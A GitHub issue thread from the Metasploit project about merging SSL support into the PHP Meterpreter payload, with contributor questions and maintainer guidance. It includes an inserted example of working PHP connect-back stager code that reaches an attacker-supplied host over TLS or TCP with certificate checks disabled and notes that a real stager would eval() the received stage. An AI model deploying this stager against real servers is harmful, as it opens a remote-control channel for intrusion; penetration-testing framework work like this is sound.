
Update PHP Meterpreter SSL Support Code #8075

Open
busterb opened this Issue Mar 8, 2017 · 10 comments

Comments

5 participants

busterb commented Mar 8, 2017

See: #7669

The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly. To be able to move forward with the original PR, you would need to:

  1. Move the PHP code into the new repository at rapid7/metasploit-payloads.
  2. Deduplicate / merge the functionality if possible. The original PR just made a copy of the Meterpreter base code.

Ideally a single payload could work in PHP environments with or without SSL support as well. You'll have to do some experimentation to see if that is possible. See the extensive notes from @sempervictus in the original PR notes above.

This is a useful way for someone interested in Meterpreter and payloads to get involved.
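An added example of the single-payload approach described above: one PHP connect-back body that uses a TLS transport when the interpreter exposes one and falls back to plain TCP otherwise. This is illustrative code written for this page, not code from the original PR, this issue, or metasploit-payloads; the function names, the LHOST/LPORT environment variables, and the decision to disable certificate verification are assumptions. It avoids scalar type declarations so it also runs on older PHP 5 interpreters.

```php
<?php
// Added example, not part of the issue, the original PR or metasploit-payloads.
// Demonstrates one stager body that works with or without ext/openssl.

// Does this PHP build expose a TLS-capable stream transport?
// Without ext/openssl, stream_get_transports() lists only tcp/udp/unix/udg,
// and stream_socket_client('tls://...') fails with "Unable to find the socket
// transport". Checking the transport list is what the connect call consults,
// so it is more reliable than extension_loaded('openssl') alone.
function has_tls_transport()
{
    $transports = stream_get_transports();
    return in_array('tls', $transports, true) || in_array('ssl', $transports, true);
}

// Pick the URI scheme for the connect-back from the capability check.
function pick_scheme($tls_available)
{
    return $tls_available ? 'tls' : 'tcp';
}

// Build a stream context for the chosen scheme. Assumption: the handler
// presents a self-signed certificate generated at run time, so peer
// verification is deliberately disabled here (the same trade-off any
// Meterpreter-style stager makes); without this the TLS handshake fails.
function build_context($scheme)
{
    if ($scheme !== 'tls') {
        return stream_context_create();
    }
    return stream_context_create(array(
        'ssl' => array(
            'verify_peer'      => false,
            'verify_peer_name' => false,
        ),
    ));
}

// Connect back using the usable scheme; returns the stream or null on failure.
function connect_back($host, $port, $scheme = null, $timeout = 10)
{
    if ($scheme === null) {
        $scheme = pick_scheme(has_tls_transport());
    }
    $ctx    = build_context($scheme);
    $errno  = 0;
    $errstr = '';
    $sock   = @stream_socket_client(
        sprintf('%s://%s:%d', $scheme, $host, (int) $port),
        $errno, $errstr, $timeout,
        STREAM_CLIENT_CONNECT, $ctx
    );
    if ($sock === false) {
        fwrite(STDERR, "connect ($scheme) failed: [$errno] $errstr\n");
        return null;
    }
    return $sock;
}

// Demo: report what this interpreter can do, and only attempt a connection
// when LHOST/LPORT are supplied in the environment (assumed names, chosen to
// mirror the Metasploit datastore options; they are not read by Metasploit).
$tls = has_tls_transport();
printf("openssl loaded: %s, tls transport: %s, chosen scheme: %s\n",
    extension_loaded('openssl') ? 'yes' : 'no',
    $tls ? 'yes' : 'no',
    pick_scheme($tls));

$host = getenv('LHOST');
$port = getenv('LPORT');
if ($host !== false && $port !== false) {
    $sock = connect_back($host, $port);
    if ($sock !== null) {
        // A real stager would now read the stage length and eval() the stage;
        // here we only confirm that the stream came up over the chosen scheme.
        $meta = stream_get_meta_data($sock);
        printf("connected via %s\n", isset($meta['stream_type']) ? $meta['stream_type'] : 'unknown');
        fclose($sock);
    }
}
```

Running the script with no environment variables just prints the capability report, which is the quick way to confirm on a given target whether the SSL path is even available before debugging handler-side problems. The caveat worth keeping in mind is that disabling peer verification means the TLS layer only provides confidentiality against passive observers; any authentication of the handler has to happen at the Meterpreter protocol layer.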

shucon commented Mar 17, 2017

I am interested in working on this issue.
I am new to the git community; kindly help me to work on it.

itsmeroy2012 commented Mar 20, 2017

1. The PHP code is already present in the new repository at rapid7/metasploit-payloads. Do we have to move something else too?
2. I am unable to 'make install-php' payloads in the repo metasploit-payloads after cloning it.
3. Regarding the merging of the functionality portion, how do I test whether it works or not in metasploit-payloads? Is there 'rake spec' there too?

busterb commented Mar 20, 2017

Please look at the original PR carefully. It adds a file called data/meterpreter/meterpreter_ssl.php, the contents of which should be inside of metasploit-payloads now.

If your install works correctly, you should see something like this:

~/projects/metasploit-payloads$ make install-php
Installing PHP payloads
busterb commented Mar 20, 2017

To test this, you would of course check out the original PR, and devise a test plan for starting the payload, ensuring it works in different environments. You might ping @bwatters-r7 to facilitate some automatic testing of PHP payloads.

sempervictus commented Mar 20, 2017

itsmeroy2012 commented Mar 22, 2017

Where is the file 'reverse_tcp.php'? Are we supposed to write it down? @sempervictus @busterb

busterb commented Mar 23, 2017

Sorry man, question does not compute.

itsmeroy2012 commented Mar 23, 2017

Apologies, I should have been more detailed. @timwr @busterb
While studying the five files that @sempervictus created here https://github.com/rapid7/metasploit-framework/pull/7669/files, there is one particular file, metasploit-framework/modules/payloads/stagers/php/reverse_tcp_ssl.rb, which is uploaded below. In that file, check line 39. It reads from another file, reverse_tcp.php. I'm uploading the file as .txt as GitHub doesn't support .rb:

File: reverse_tcp_ssl.txt

busterb commented Mar 23, 2017

As mentioned in the first sentence of this issue, "The original PR was based on an older layout of the Metasploit repository and no longer applies cleanly." In other words, that file has been renamed and moved since the original PR. You can use git to dredge it up from history if you like (please don't ask me how, that's left as an exercise to the reader).

I suggest just looking at what the code in the original PR does and, using it as a guide, reimplementing the functionality using @sempervictus's suggestions above and on the original PR.
